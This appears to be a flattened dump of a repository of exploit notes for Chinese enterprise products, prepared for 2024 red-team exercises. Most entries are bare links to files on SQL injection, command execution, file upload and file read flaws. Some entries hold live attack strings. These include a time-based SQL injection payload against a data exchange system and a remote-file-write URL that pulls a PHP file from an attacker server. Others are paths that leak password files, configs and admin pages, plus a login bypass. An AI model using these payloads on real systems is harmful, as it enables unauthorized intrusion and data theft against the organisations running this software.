-------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/福建科立讯通信 指挥调度管理平台 ajax_users.php SQL 注入漏洞.md -------------------------------------------------------------------------------- /福建科立讯通信 指挥调度管理平台 ajax_users.php 信息泄露漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | /app/ext/ajax_users.php 3 | ``` 4 | 5 | -------------------------------------------------------------------------------- /福建科立讯通信 指挥调度管理平台存在远程命令执行漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/福建科立讯通信 指挥调度管理平台存在远程命令执行漏洞.md -------------------------------------------------------------------------------- /福建科立讯通信指挥调度管理平台任意文件上传.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/福建科立讯通信指挥调度管理平台任意文件上传.md -------------------------------------------------------------------------------- /科拓全智能停车视频收费系统CancelldList存在SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/科拓全智能停车视频收费系统CancelldList存在SQL注入漏洞.md -------------------------------------------------------------------------------- /科荣 AIO 管理系统任意文件读取.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/科荣 AIO 管理系统任意文件读取.md -------------------------------------------------------------------------------- /科荣AIO moffice SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/科荣AIO moffice SQL注入漏洞.md -------------------------------------------------------------------------------- /科荣AIO系统UtilServlet存在任意命令执行漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/科荣AIO系统UtilServlet存在任意命令执行漏洞.md -------------------------------------------------------------------------------- /科讯校园一卡通管理系统 dormitoryHealthRankingSQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/科讯校园一卡通管理系统 dormitoryHealthRankingSQL注入漏洞.md -------------------------------------------------------------------------------- /科讯校园一卡通管理系统 get_kq_tj_today SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/科讯校园一卡通管理系统 get_kq_tj_today SQL注入漏洞.md -------------------------------------------------------------------------------- /竹云 信息泄露.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/竹云 信息泄露.md -------------------------------------------------------------------------------- /紫光-电子档案管理系统-PermissionAC.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/紫光-电子档案管理系统-PermissionAC.md -------------------------------------------------------------------------------- /红海云eHR kqFile.mob 任意文件上传.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/红海云eHR kqFile.mob 任意文件上传.md -------------------------------------------------------------------------------- /绿盟 SAS堡垒机 Exec 远程命令执行漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/绿盟 SAS堡垒机 Exec 远程命令执行漏洞.md -------------------------------------------------------------------------------- /网康 NS-ASG sql 注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/网康 NS-ASG sql 注入漏洞.md -------------------------------------------------------------------------------- /网康 NS-ASG 信息泄露漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | /configsave/manufacture-default.tar.gz 3 | ``` 4 | 5 | -------------------------------------------------------------------------------- /网神SecSSL3600安全接入网关系统任意密码修改漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/网神SecSSL3600安全接入网关系统任意密码修改漏洞.md -------------------------------------------------------------------------------- /联软安渡 UniNXG 安全数据交换系统SQL 注入漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | UniExServices/link/queryLinklnfo?address=';SELECT PG_SLEEP(5)-- 3 | ``` 4 | 5 | -------------------------------------------------------------------------------- /联软安渡UniNXG安全数据交换系统poserver.zz存在任意文件读取漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/联软安渡UniNXG安全数据交换系统poserver.zz存在任意文件读取漏洞.md -------------------------------------------------------------------------------- /致远 OA fileUpload.do 前台文件上传绕过漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/致远 OA fileUpload.do 前台文件上传绕过漏洞.md -------------------------------------------------------------------------------- /致远AnalyticsCloud 分析云存在任意文件读取漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/致远AnalyticsCloud 分析云存在任意文件读取漏洞.md -------------------------------------------------------------------------------- /致远constDef接囗存在代码执行漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/致远constDef接囗存在代码执行漏洞.md -------------------------------------------------------------------------------- /致远互联-M1移动协同办公管理软件-RCE.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/致远互联-M1移动协同办公管理软件-RCE.md -------------------------------------------------------------------------------- /致远互联FE协作办公平台apprvaddNew存在SQL注入.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/致远互联FE协作办公平台apprvaddNew存在SQL注入.md -------------------------------------------------------------------------------- /蓝凌 EKP 远程代码执行漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/蓝凌 EKP 远程代码执行漏洞.md -------------------------------------------------------------------------------- /蓝凌EIS智慧协同平台ShowUserInfo.aspx SQL注入.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/蓝凌EIS智慧协同平台ShowUserInfo.aspx SQL注入.md -------------------------------------------------------------------------------- /蓝凌EIS智慧协同平台UniformEntry.aspx SQL注入.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/蓝凌EIS智慧协同平台UniformEntry.aspx SQL注入.md -------------------------------------------------------------------------------- /蓝凌EIS智慧协同平台doc_fileedit_word.aspx SQL注入.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/蓝凌EIS智慧协同平台doc_fileedit_word.aspx SQL注入.md -------------------------------------------------------------------------------- /蓝凌EIS智慧协同平台fl_define_flow_chart_show.aspx SQL注入.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/蓝凌EIS智慧协同平台fl_define_flow_chart_show.aspx SQL注入.md -------------------------------------------------------------------------------- /蓝凌EIS智慧协同平台frm_button_func.aspx SQL注入.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/蓝凌EIS智慧协同平台frm_button_func.aspx SQL注入.md -------------------------------------------------------------------------------- /蓝凌EIS智慧协同平台frm_form_list_main.aspx SQL注入.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/蓝凌EIS智慧协同平台frm_form_list_main.aspx SQL注入.md -------------------------------------------------------------------------------- /蓝凌EKP存在sys_ui_component远程命令执行漏洞 .md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/蓝凌EKP存在sys_ui_component远程命令执行漏洞 .md -------------------------------------------------------------------------------- /西软云XMS-futurehoteloperate接口存在XXE漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/西软云XMS-futurehoteloperate接口存在XXE漏洞.md -------------------------------------------------------------------------------- /证书查询系统存在任意文件读取漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/证书查询系统存在任意文件读取漏洞.md -------------------------------------------------------------------------------- /资管云--任意文件上传.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/资管云--任意文件上传.md -------------------------------------------------------------------------------- /赛蓝企业管理系统 DownloadBuilder 任意文件读取漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/赛蓝企业管理系统 DownloadBuilder 任意文件读取漏洞.md -------------------------------------------------------------------------------- /赛蓝企业管理系统GetJSFile存在任意文件读取漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/赛蓝企业管理系统GetJSFile存在任意文件读取漏洞.md -------------------------------------------------------------------------------- /赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞.md -------------------------------------------------------------------------------- /超级猫签名APP分发平台前台存在SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/超级猫签名APP分发平台前台存在SQL注入漏洞.md -------------------------------------------------------------------------------- /超级猫签名APP分发平台前台远程文件写入漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | /user/profile/download?url=http://云服务器地址/111.php&path=1 3 | ``` 4 | 5 | -------------------------------------------------------------------------------- /迈普-多业务融合网关-信息泄露.md: -------------------------------------------------------------------------------- 1 | ``` 2 | /.htpasswd/ 3 | ``` 4 | 5 | -------------------------------------------------------------------------------- /通天星 CMSV6 车载视频监控平台 disable 存在 SQL 注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/通天星 CMSV6 车载视频监控平台 disable 存在 SQL 注入漏洞.md -------------------------------------------------------------------------------- /通达OA V11.10 login.php SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/通达OA V11.10 login.php SQL注入漏洞.md -------------------------------------------------------------------------------- /邦永PM2项目管理平台系统ExcelIn.aspx存在任意文件上传漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/邦永PM2项目管理平台系统ExcelIn.aspx存在任意文件上传漏洞.md -------------------------------------------------------------------------------- /金万维-云联应用系统接入平台GNRemote.dll前台存在RCE漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/金万维-云联应用系统接入平台GNRemote.dll前台存在RCE漏洞.md -------------------------------------------------------------------------------- /金万维云联应用系统接入平台RCE.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/金万维云联应用系统接入平台RCE.md -------------------------------------------------------------------------------- /金和 OA C6 GeneralXmlhttpPage.aspx SQL 注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/金和 OA C6 GeneralXmlhttpPage.aspx SQL 注入漏洞.md -------------------------------------------------------------------------------- /金和OA jc6 clobfield SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/金和OA jc6 clobfield SQL注入漏洞.md -------------------------------------------------------------------------------- /金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞.md -------------------------------------------------------------------------------- /金和OAC6-FileDownLoad.aspx任意文件读取漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/金和OAC6-FileDownLoad.aspx任意文件读取漏洞.md -------------------------------------------------------------------------------- /金和OA_C6_UploadFileDownLoadnew存在任意文件读取漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/金和OA_C6_UploadFileDownLoadnew存在任意文件读取漏洞.md -------------------------------------------------------------------------------- /金和OA_CarCardInfo.aspx_SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/金和OA_CarCardInfo.aspx_SQL注入漏洞.md -------------------------------------------------------------------------------- /金和OA_HomeService.asmxSQL注入.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/金和OA_HomeService.asmxSQL注入.md -------------------------------------------------------------------------------- /金和OA_MailTemplates.aspx_SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/金和OA_MailTemplates.aspx_SQL注入漏洞.md -------------------------------------------------------------------------------- /金和OA_SAP_B1Config.aspx未授权访问漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | /C6/JHsoft.CostEAI/SAP_B1Config.aspx/?manage=1 3 | ``` 4 | 5 | -------------------------------------------------------------------------------- /金和OA_jc6_Upload任意文件上传.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/金和OA_jc6_Upload任意文件上传.md -------------------------------------------------------------------------------- /金和OA_jc6_ntko-upload任意文件上传漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/金和OA_jc6_ntko-upload任意文件上传漏洞.md -------------------------------------------------------------------------------- /金和OA_jc6_viewConTemplate.action存在FreeMarker模板注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/金和OA_jc6_viewConTemplate.action存在FreeMarker模板注入漏洞.md -------------------------------------------------------------------------------- /金和OA_upload_json.asp存在任意文件上传漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/金和OA_upload_json.asp存在任意文件上传漏洞.md -------------------------------------------------------------------------------- /金和OA_uploadfileeditorsave接口存在任意文件上传漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/金和OA_uploadfileeditorsave接口存在任意文件上传漏洞.md -------------------------------------------------------------------------------- /金和OA任意文件读取漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/金和OA任意文件读取漏洞.md -------------------------------------------------------------------------------- /金慧综合管理信息系统SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/金慧综合管理信息系统SQL注入漏洞.md -------------------------------------------------------------------------------- /铭飞MCMS 远程代码执行漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/铭飞MCMS 远程代码执行漏洞.md -------------------------------------------------------------------------------- /锐捷-EG易网关存在RCE漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/锐捷-EG易网关存在RCE漏洞.md -------------------------------------------------------------------------------- /锐捷EG350易网关管理系统存在信息泄露漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | /tool/shell/nginx.conf 3 | ``` 4 | 5 | -------------------------------------------------------------------------------- /锐捷M18000-WS-ED无线控制器存在CRL命令注入.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/锐捷M18000-WS-ED无线控制器存在CRL命令注入.md -------------------------------------------------------------------------------- /锐捷RG-NAC统一上网行为管理与审计系统存在远程代码执行漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/锐捷RG-NAC统一上网行为管理与审计系统存在远程代码执行漏洞.md -------------------------------------------------------------------------------- /锐捷RG-NBS2026G-P交换机WEB管理 ping.htm 未授权访问漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | /safety/ping.htm 3 | ``` 4 | 5 | -------------------------------------------------------------------------------- /锐捷统一上网行为管理与审计系统 static_convert.php 命令执行.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/锐捷统一上网行为管理与审计系统 static_convert.php 命令执行.md -------------------------------------------------------------------------------- /飞企互联loginService任意登录.md: -------------------------------------------------------------------------------- 1 | ``` 2 | /loginService.fe?op=D 3 | ``` 4 | 5 | -------------------------------------------------------------------------------- /飞讯云MyImportData前台SQL注入.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/飞讯云MyImportData前台SQL注入.md -------------------------------------------------------------------------------- /飞讯云WMS MyDownMylmportData 前台SQL注入.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/飞讯云WMS MyDownMylmportData 前台SQL注入.md -------------------------------------------------------------------------------- /魔方网表 mailupdate.jsp 接口 任意文件上传.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/魔方网表 mailupdate.jsp 接口 任意文件上传.md --------------------------------------------------------------------------------